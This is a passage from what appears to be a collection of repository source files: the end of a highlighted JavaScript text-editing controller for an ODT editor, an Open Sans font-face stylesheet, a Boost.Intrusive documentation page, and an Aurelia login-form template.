</span><span class="NAME">stepIterator</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>328</span> <span class='line'>329</span> </span><span class="WHIT"> </span><span class="KEYW">if</span><span class="WHIT"> </span><span class="PUNC">(</span><span class="NAME">selection.length</span><span class="WHIT"> </span><span class="PUNC">===</span><span class="WHIT"> </span><span class="NUMB">0</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>330</span> </span><span class="WHIT"> </span><span class="NAME">selection</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="NAME">undefined</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>331</span> </span><span class="WHIT"> </span><span class="NAME">cursorNode</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="NAME">odtDocument.getCursor</span><span class="PUNC">(</span><span class="NAME">inputMemberId</span><span class="PUNC">)</span><span class="PUNC">.</span><span class="NAME">getNode</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>332</span> </span><span class="WHIT"> </span><span class="NAME">stepIterator</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="NAME">createStepIterator</span><span class="PUNC">(</span><span class="NAME">cursorNode</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>333</span> </span><span class="WHIT"> </span><span class="COMM">// There must be at least one more step in the root same root as the cursor node</span><span class="WHIT"> <span class='line'>334</span> </span><span class="WHIT"> </span><span class="COMM">// in order to do something if there is no selected text</span><span class="WHIT"> <span class='line'>335</span> </span><span class="WHIT"> </span><span class="COMM">// TODO Superstition alert - Step rounding is probably not necessary as cursor should always be at a step</span><span class="WHIT"> <span class='line'>336</span> </span><span class="WHIT"> </span><span class="KEYW">if</span><span class="WHIT"> </span><span class="PUNC">(</span><span class="NAME">stepIterator.roundToClosestStep</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="WHIT"> <span class='line'>337</span> </span><span class="WHIT"> </span><span class="PUNC">&&</span><span class="WHIT"> </span><span class="PUNC">(</span><span class="NAME">isForward</span><span class="WHIT"> </span><span class="PUNC">?</span><span class="WHIT"> </span><span class="NAME">stepIterator.nextStep</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">:</span><span class="WHIT"> </span><span class="NAME">stepIterator.previousStep</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="PUNC">)</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>338</span> </span><span class="WHIT"> </span><span class="NAME">selection</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="NAME">toForwardSelection</span><span class="PUNC">(</span><span class="NAME">odtDocument.convertDomToCursorRange</span><span class="PUNC">(</span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>339</span> </span><span class="WHIT"> </span><span class="NAME">anchorNode</span><span class="PUNC">:</span><span class="WHIT"> </span><span class="NAME">cursorNode</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>340</span> </span><span class="WHIT"> </span><span class="NAME">anchorOffset</span><span class="PUNC">:</span><span class="WHIT"> </span><span class="NUMB">0</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>341</span> </span><span class="WHIT"> </span><span class="NAME">focusNode</span><span class="PUNC">:</span><span class="WHIT"> </span><span class="NAME">stepIterator.container</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>342</span> </span><span class="WHIT"> </span><span class="NAME">focusOffset</span><span class="PUNC">:</span><span class="WHIT"> </span><span class="NAME">stepIterator.offset</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="WHIT"> <span class='line'>343</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="PUNC">)</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>344</span> </span><span class="WHIT"> </span><span class="KEYW">if</span><span class="WHIT"> </span><span class="PUNC">(</span><span class="NAME">isForward</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>345</span> </span><span class="WHIT"> </span><span class="NAME">range.setStart</span><span class="PUNC">(</span><span class="NAME">cursorNode</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="NUMB">0</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>346</span> </span><span class="WHIT"> </span><span class="NAME">range.setEnd</span><span class="PUNC">(</span><span class="NAME">stepIterator.container</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="NAME">stepIterator.offset</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>347</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> </span><span class="KEYW">else</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>348</span> </span><span class="WHIT"> </span><span class="NAME">range.setStart</span><span class="PUNC">(</span><span class="NAME">stepIterator.container</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="NAME">stepIterator.offset</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>349</span> </span><span class="WHIT"> </span><span class="NAME">range.setEnd</span><span class="PUNC">(</span><span class="NAME">cursorNode</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="NUMB">0</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>350</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> <span class='line'>351</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> <span class='line'>352</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> <span class='line'>353</span> </span><span class="WHIT"> </span><span class="KEYW">if</span><span class="WHIT"> </span><span class="PUNC">(</span><span class="NAME">selection</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>354</span> </span><span class="WHIT"> </span><span class="NAME">session.enqueue</span><span class="PUNC">(</span><span class="NAME">createRemoveSelectionOps</span><span class="PUNC">(</span><span class="NAME">range</span><span class="PUNC">)</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>355</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> <span class='line'>356</span> </span><span class="WHIT"> </span><span class="KEYW">return</span><span class="WHIT"> </span><span class="NAME">selection</span><span class="WHIT"> </span><span class="PUNC">!==</span><span class="WHIT"> </span><span class="NAME">undefined</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>357</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> <span class='line'>358</span> <span class='line'>359</span> </span><span class="WHIT"> </span><span class="COMM">/** <span class='line'>360</span> * Removes the currently selected content. If no content is selected and there is at least <span class='line'>361</span> * one character to the left of the current selection, that character will be removed instead. <span class='line'>362</span> * @return {!boolean} <span class='line'>363</span> */</span><span class="WHIT"> <span class='line'>364</span> </span><span class="WHIT"> </span><span class="NAME">this.removeTextByBackspaceKey</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="KEYW">function</span><span class="WHIT"> </span><span class="PUNC">(</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>365</span> </span><span class="WHIT"> </span><span class="KEYW">return</span><span class="WHIT"> </span><span class="NAME">removeTextInDirection</span><span class="PUNC">(</span><span class="NAME">BACKWARD</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>366</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>367</span> <span class='line'>368</span> </span><span class="WHIT"> </span><span class="COMM">/** <span class='line'>369</span> * Removes the currently selected content. If no content is selected and there is at least <span class='line'>370</span> * one character to the right of the current selection, that character will be removed instead. <span class='line'>371</span> * @return {!boolean} <span class='line'>372</span> */</span><span class="WHIT"> <span class='line'>373</span> </span><span class="WHIT"> </span><span class="NAME">this.removeTextByDeleteKey</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="KEYW">function</span><span class="WHIT"> </span><span class="PUNC">(</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>374</span> </span><span class="WHIT"> </span><span class="KEYW">return</span><span class="WHIT"> </span><span class="NAME">removeTextInDirection</span><span class="PUNC">(</span><span class="NAME">FORWARD</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>375</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>376</span> <span class='line'>377</span> </span><span class="WHIT"> </span><span class="COMM">/** <span class='line'>378</span> * Removes the currently selected content <span class='line'>379</span> * @return {!boolean} <span class='line'>380</span> */</span><span class="WHIT"> <span class='line'>381</span> </span><span class="WHIT"> </span><span class="NAME">this.removeCurrentSelection</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="KEYW">function</span><span class="WHIT"> </span><span class="PUNC">(</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>382</span> </span><span class="WHIT"> </span><span class="KEYW">if</span><span class="WHIT"> </span><span class="PUNC">(</span><span class="PUNC">!</span><span class="NAME">isEnabled</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>383</span> </span><span class="WHIT"> </span><span class="KEYW">return</span><span class="WHIT"> </span><span class="KEYW">false</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>384</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> <span class='line'>385</span> <span class='line'>386</span> </span><span class="WHIT"> </span><span class="KEYW">var</span><span class="WHIT"> </span><span class="NAME">range</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="NAME">odtDocument.getCursor</span><span class="PUNC">(</span><span class="NAME">inputMemberId</span><span class="PUNC">)</span><span class="PUNC">.</span><span class="NAME">getSelectedRange</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>387</span> </span><span class="WHIT"> </span><span class="NAME">session.enqueue</span><span class="PUNC">(</span><span class="NAME">createRemoveSelectionOps</span><span class="PUNC">(</span><span class="NAME">range</span><span class="PUNC">)</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>388</span> </span><span class="WHIT"> </span><span class="KEYW">return</span><span class="WHIT"> </span><span class="KEYW">true</span><span class="PUNC">;</span><span class="WHIT"> </span><span class="COMM">// The function is always considered handled, even if nothing is removed</span><span class="WHIT"> <span class='line'>389</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>390</span> <span class='line'>391</span> </span><span class="WHIT"> </span><span class="COMM">/** <span class='line'>392</span> * Removes currently selected text (if any) before inserting the supplied text. <span class='line'>393</span> * @param {!string} text <span class='line'>394</span> * @return {undefined} <span class='line'>395</span> */</span><span class="WHIT"> <span class='line'>396</span> </span><span class="WHIT"> </span><span class="KEYW">function</span><span class="WHIT"> </span><span class="NAME">insertText</span><span class="PUNC">(</span><span class="NAME">text</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>397</span> </span><span class="WHIT"> </span><span class="KEYW">if</span><span class="WHIT"> </span><span class="PUNC">(</span><span class="PUNC">!</span><span class="NAME">isEnabled</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>398</span> </span><span class="WHIT"> </span><span class="KEYW">return</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>399</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> <span class='line'>400</span> <span class='line'>401</span> </span><span class="WHIT"> </span><span class="KEYW">var</span><span class="WHIT"> </span><span class="NAME">range</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="NAME">odtDocument.getCursor</span><span class="PUNC">(</span><span class="NAME">inputMemberId</span><span class="PUNC">)</span><span class="PUNC">.</span><span class="NAME">getSelectedRange</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>402</span> </span><span class="WHIT"> </span><span class="NAME">selection</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="NAME">toForwardSelection</span><span class="PUNC">(</span><span class="NAME">odtDocument.getCursorSelection</span><span class="PUNC">(</span><span class="NAME">inputMemberId</span><span class="PUNC">)</span><span class="PUNC">)</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>403</span> </span><span class="WHIT"> </span><span class="NAME">op</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="NAME">stylingOp</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="NAME">operations</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="PUNC">[</span><span class="PUNC">]</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="NAME">useCachedStyle</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="KEYW">false</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>404</span> <span class='line'>405</span> </span><span class="WHIT"> </span><span class="KEYW">if</span><span class="WHIT"> </span><span class="PUNC">(</span><span class="NAME">selection.length</span><span class="WHIT"> </span><span class="PUNC">></span><span class="WHIT"> </span><span class="NUMB">0</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>406</span> </span><span class="WHIT"> </span><span class="NAME">operations</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="NAME">operations.concat</span><span class="PUNC">(</span><span class="NAME">createRemoveSelectionOps</span><span class="PUNC">(</span><span class="NAME">range</span><span class="PUNC">)</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>407</span> </span><span class="WHIT"> </span><span class="NAME">useCachedStyle</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="KEYW">true</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>408</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> <span class='line'>409</span> <span class='line'>410</span> </span><span class="WHIT"> </span><span class="NAME">op</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="KEYW">new</span><span class="WHIT"> </span><span class="NAME">ops.OpInsertText</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>411</span> </span><span class="WHIT"> </span><span class="NAME">op.init</span><span class="PUNC">(</span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>412</span> </span><span class="WHIT"> </span><span class="NAME">memberid</span><span class="PUNC">:</span><span class="WHIT"> </span><span class="NAME">inputMemberId</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>413</span> </span><span class="WHIT"> </span><span class="NAME">position</span><span class="PUNC">:</span><span class="WHIT"> </span><span class="NAME">selection.position</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>414</span> </span><span class="WHIT"> </span><span class="NAME">text</span><span class="PUNC">:</span><span class="WHIT"> </span><span class="NAME">text</span><span class="PUNC">,</span><span class="WHIT"> <span class='line'>415</span> </span><span class="WHIT"> </span><span class="NAME">moveCursor</span><span class="PUNC">:</span><span class="WHIT"> </span><span class="KEYW">true</span><span class="WHIT"> <span class='line'>416</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>417</span> </span><span class="WHIT"> </span><span class="NAME">operations.push</span><span class="PUNC">(</span><span class="NAME">op</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>418</span> </span><span class="WHIT"> </span><span class="KEYW">if</span><span class="WHIT"> </span><span class="PUNC">(</span><span class="NAME">directStyleOp</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>419</span> </span><span class="WHIT"> </span><span class="NAME">stylingOp</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="NAME">directStyleOp</span><span class="PUNC">(</span><span class="NAME">selection.position</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="NAME">text.length</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="NAME">useCachedStyle</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>420</span> </span><span class="WHIT"> </span><span class="KEYW">if</span><span class="WHIT"> </span><span class="PUNC">(</span><span class="NAME">stylingOp</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>421</span> </span><span class="WHIT"> </span><span class="NAME">operations.push</span><span class="PUNC">(</span><span class="NAME">stylingOp</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>422</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> <span class='line'>423</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> <span class='line'>424</span> </span><span class="WHIT"> </span><span class="NAME">session.enqueue</span><span class="PUNC">(</span><span class="NAME">operations</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>425</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> <span class='line'>426</span> </span><span class="WHIT"> </span><span class="NAME">this.insertText</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="NAME">insertText</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>427</span> <span class='line'>428</span> </span><span class="WHIT"> </span><span class="COMM">/** <span class='line'>429</span> * @param {!function(!Error=)} callback, passing an error object in case of error <span class='line'>430</span> * @return {undefined} <span class='line'>431</span> */</span><span class="WHIT"> <span class='line'>432</span> </span><span class="WHIT"> </span><span class="NAME">this.destroy</span><span class="WHIT"> </span><span class="PUNC">=</span><span class="WHIT"> </span><span class="KEYW">function</span><span class="WHIT"> </span><span class="PUNC">(</span><span class="NAME">callback</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>433</span> </span><span class="WHIT"> </span><span class="NAME">odtDocument.unsubscribe</span><span class="PUNC">(</span><span class="NAME">ops.Document.signalCursorMoved</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="NAME">onCursorEvent</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>434</span> </span><span class="WHIT"> </span><span class="NAME">sessionConstraints.unsubscribe</span><span class="PUNC">(</span><span class="NAME">gui.CommonConstraints.EDIT.REVIEW_MODE</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="NAME">updateEnabledState</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>435</span> </span><span class="WHIT"> </span><span class="NAME">callback</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>436</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>437</span> <span class='line'>438</span> </span><span class="WHIT"> </span><span class="KEYW">function</span><span class="WHIT"> </span><span class="NAME">init</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="WHIT"> </span><span class="PUNC">{</span><span class="WHIT"> <span class='line'>439</span> </span><span class="WHIT"> </span><span class="NAME">odtDocument.subscribe</span><span class="PUNC">(</span><span class="NAME">ops.Document.signalCursorMoved</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="NAME">onCursorEvent</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>440</span> </span><span class="WHIT"> </span><span class="NAME">sessionConstraints.subscribe</span><span class="PUNC">(</span><span class="NAME">gui.CommonConstraints.EDIT.REVIEW_MODE</span><span class="PUNC">,</span><span class="WHIT"> </span><span class="NAME">updateEnabledState</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>441</span> </span><span class="WHIT"> </span><span class="NAME">updateEnabledState</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>442</span> </span><span class="WHIT"> </span><span class="PUNC">}</span><span class="WHIT"> <span class='line'>443</span> </span><span class="WHIT"> </span><span class="NAME">init</span><span class="PUNC">(</span><span class="PUNC">)</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>444</span> </span><span class="PUNC">}</span><span class="PUNC">;</span><span class="WHIT"> <span class='line'>445</span> </span></pre></body></html>
wp-content/themes/auris_onepage/font-faces/Opensans/stylesheet.css
mihaienescu1/wp_wmihu
/* Generated by Font Squirrel (http://www.fontsquirrel.com) on March 17, 2011 10:11:08 AM America/New_York */ @font-face { font-family: 'OpenSansRegular'; src: url('opensans-regular-webfont.eot'); src: url('opensans-regular-webfont.eot?#iefix') format('embedded-opentype'), url('opensans-regular-webfont.woff') format('woff'), url('opensans-regular-webfont.ttf') format('truetype'), url('opensans-regular-webfont.svg#OpenSansRegular') format('svg'); font-weight: normal; font-style: normal; } @font-face { font-family: 'OpenSansSemibold'; src: url('opensans-semibold-webfont.eot'); src: url('opensans-semibold-webfont.eot?#iefix') format('embedded-opentype'), url('opensans-semibold-webfont.woff') format('woff'), url('opensans-semibold-webfont.ttf') format('truetype'), url('opensans-semibold-webfont.svg#OpenSansSemibold') format('svg'); font-weight: normal; font-style: normal; } @font-face { font-family: 'OpenSansBold'; src: url('opensans-bold-webfont.eot'); src: url('opensans-bold-webfont.eot?#iefix') format('embedded-opentype'), url('opensans-bold-webfont.woff') format('woff'), url('opensans-bold-webfont.ttf') format('truetype'), url('opensans-bold-webfont.svg#OpenSansBold') format('svg'); font-weight: normal; font-style: normal; } @font-face { font-family: 'OpenSansBoldItalic'; src: url('opensans-bolditalic-webfont.eot'); src: url('opensans-bolditalic-webfont.eot?#iefix') format('embedded-opentype'), url('opensans-bolditalic-webfont.woff') format('woff'), url('opensans-bolditalic-webfont.ttf') format('truetype'), url('opensans-bolditalic-webfont.svg#OpenSansBoldItalic') format('svg'); font-weight: normal; font-style: normal; } @font-face { font-family: 'OpenSansExtraBold'; src: url('opensans-extrabold-webfont.eot'); src: url('opensans-extrabold-webfont.eot?#iefix') format('embedded-opentype'), url('opensans-extrabold-webfont.woff') format('woff'), url('opensans-extrabold-webfont.ttf') format('truetype'), url('opensans-extrabold-webfont.svg#OpenSansExtraBold') format('svg'); font-weight: normal; font-style: normal; } @font-face { font-family: 'OpenSansExtraBoldItalic'; src: url('opensans-extrabolditalic-webfont.eot'); src: url('opensans-extrabolditalic-webfont.eot?#iefix') format('embedded-opentype'), url('opensans-extrabolditalic-webfont.woff') format('woff'), url('opensans-extrabolditalic-webfont.ttf') format('truetype'), url('opensans-extrabolditalic-webfont.svg#OpenSansExtraBoldItalic') format('svg'); font-weight: normal; font-style: normal; } @font-face { font-family: 'OpenSansItalic'; src: url('opensans-italic-webfont.eot'); src: url('opensans-italic-webfont.eot?#iefix') format('embedded-opentype'), url('opensans-italic-webfont.woff') format('woff'), url('opensans-italic-webfont.ttf') format('truetype'), url('opensans-italic-webfont.svg#OpenSansItalic') format('svg'); font-weight: normal; font-style: normal; } @font-face { font-family: 'OpenSansLight'; src: url('opensans-light-webfont.eot'); src: url('opensans-light-webfont.eot?#iefix') format('embedded-opentype'), url('opensans-light-webfont.woff') format('woff'), url('opensans-light-webfont.ttf') format('truetype'), url('opensans-light-webfont.svg#OpenSansLight') format('svg'); font-weight: normal; font-style: normal; } @font-face { font-family: 'OpenSansSemiboldItalic'; src: url('opensans-semibolditalic-webfont.eot'); src: url('opensans-semibolditalic-webfont.eot?#iefix') format('embedded-opentype'), url('opensans-semibolditalic-webfont.woff') format('woff'), url('opensans-semibolditalic-webfont.ttf') format('truetype'), url('opensans-semibolditalic-webfont.svg#OpenSansSemiboldItalic') format('svg'); font-weight: normal; font-style: normal; }
lib/boost/boost_1_38_0/doc/html/boost/intrusive/size_type.html
scs/uclinux
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <title>Struct template size_type</title> <link rel="stylesheet" href="../../boostbook.css" type="text/css"> <meta name="generator" content="DocBook XSL Stylesheets V1.73.2"> <link rel="start" href="../../index.html" title="The Boost C++ Libraries BoostBook Documentation Subset"> <link rel="up" href="../../intrusive/reference.html#header.boost.intrusive.options_hpp" title="Header &lt;boost/intrusive/options.hpp&gt;"> <link rel="prev" href="constant_time_size.html" title="Struct template constant_time_size"> <link rel="next" href="compare.html" title="Struct template compare"> </head> <body bgcolor="white" text="black" link="#0000FF" vlink="#840084" alink="#0000FF"> <table cellpadding="2" width="100%"><tr> <td valign="top"><img alt="Boost C++ Libraries" width="277" height="86" src="../../../../boost.png"></td> <td align="center"><a href="../../../../index.html">Home</a></td> <td align="center"><a href="../../../../libs/libraries.htm">Libraries</a></td> <td align="center"><a href="http://www.boost.org/users/people.html">People</a></td> <td align="center"><a href="http://www.boost.org/users/faq.html">FAQ</a></td> <td align="center"><a href="../../../../more/index.htm">More</a></td> </tr></table> <hr> <div class="spirit-nav"> <a accesskey="p" href="constant_time_size.html"><img src="../../../../doc/html/images/prev.png" alt="Prev"></a><a accesskey="u" href="../../intrusive/reference.html#header.boost.intrusive.options_hpp"><img src="../../../../doc/html/images/up.png" alt="Up"></a><a accesskey="h" href="../../index.html"><img src="../../../../doc/html/images/home.png" alt="Home"></a><a accesskey="n" href="compare.html"><img src="../../../../doc/html/images/next.png" alt="Next"></a> </div> <div class="refentry" lang="en"> <a name="boost.intrusive.size_type"></a><div class="titlepage"></div> <div class="refnamediv"> <h2><span class="refentrytitle">Struct template size_type</span></h2> <p>boost::intrusive::size_type</p> </div> <h2 xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" class="refsynopsisdiv-title">Synopsis</h2> <div xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" class="refsynopsisdiv"><pre class="synopsis"><span class="emphasis"><em>// In header: &lt;<a class="link" href="../../intrusive/reference.html#header.boost.intrusive.options_hpp" title="Header &lt;boost/intrusive/options.hpp&gt;">boost/intrusive/options.hpp</a>&gt; </em></span><span class="bold"><strong>template</strong></span>&lt;<span class="bold"><strong>typename</strong></span> SizeType&gt; <span class="bold"><strong>struct</strong></span> <a class="link" href="size_type.html" title="Struct template size_type">size_type</a> { };</pre></div> <div class="refsect1" lang="en"> <a name="id3571810"></a><h2>Description</h2> <p>This option setter specifies the type that the container will use to store its size. </p> </div> </div> <table xmlns:rev="http://www.cs.rpi.edu/~gregod/boost/tools/doc/revision" width="100%"><tr> <td align="left"></td> <td align="right"><div class="copyright-footer">Copyright © 2005 Olaf Krzikalla, 2006-2008 Ion Gaztañaga<p> Distributed under the Boost Software License, Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at <a href="http://www.boost.org/LICENSE_1_0.txt" target="_top">http://www.boost.org/LICENSE_1_0.txt</a>) </p> </div></td> </tr></table> <hr> <div class="spirit-nav"> <a accesskey="p" href="constant_time_size.html"><img src="../../../../doc/html/images/prev.png" alt="Prev"></a><a accesskey="u" href="../../intrusive/reference.html#header.boost.intrusive.options_hpp"><img src="../../../../doc/html/images/up.png" alt="Up"></a><a accesskey="h" href="../../index.html"><img src="../../../../doc/html/images/home.png" alt="Home"></a><a accesskey="n" href="compare.html"><img src="../../../../doc/html/images/next.png" alt="Next"></a> </div> </body> </html>
public/js/views/home.html
boubad/nbinfoapp
<template> <div if.bind="is_notconnected"> <table> <tr> <td>&nbsp;</td> <td>&nbsp;</td> <td>&nbsp;</td> <td>&nbsp;</td> <td>&nbsp;</td> <td style="text-align:center"> <div if.bind="hasErrorMessage"> <h3 show.bind="hasErrorMessage" class="text-danger">${errorMessage}</h3> </div> <table> <tr> <td> <img src.bind="loginImage"></img> </td> <td>&nbsp;&nbsp;</td> <td> <form role="form"> <div class="form-group"> <label class="control-label">Identifiant</label> <input id="username" type="text" class="form-control" value.bind="username" placeholder="Identifiant utilisateur" /> </div> <div class="form-group"> <label class="control-label">Mot de passe</label> <input id="password" type="password" class="form-control" value.bind="password" placeholder="Mot de passe" /> </div> <div class="btn-group"> <a class="btn btn-primary" click.delegate="perform_login()" href="#" show.bind="canConnect"> <i class="fa fa-user"></i>Connecter </a> </div> </form> </td> </tr> </table> </td> </tr> </table> </div> <div if.bind="is_connected"> <connect-bar info.bind="userInfo"></connect-bar> <div if.bind="hasSplashImage"> <img src.bind="splashImage"></img> </div> </div> </template>
lib/boost/boost_1_38_0/libs/exception/doc/tuple_operator_shl.html
scs/uclinux
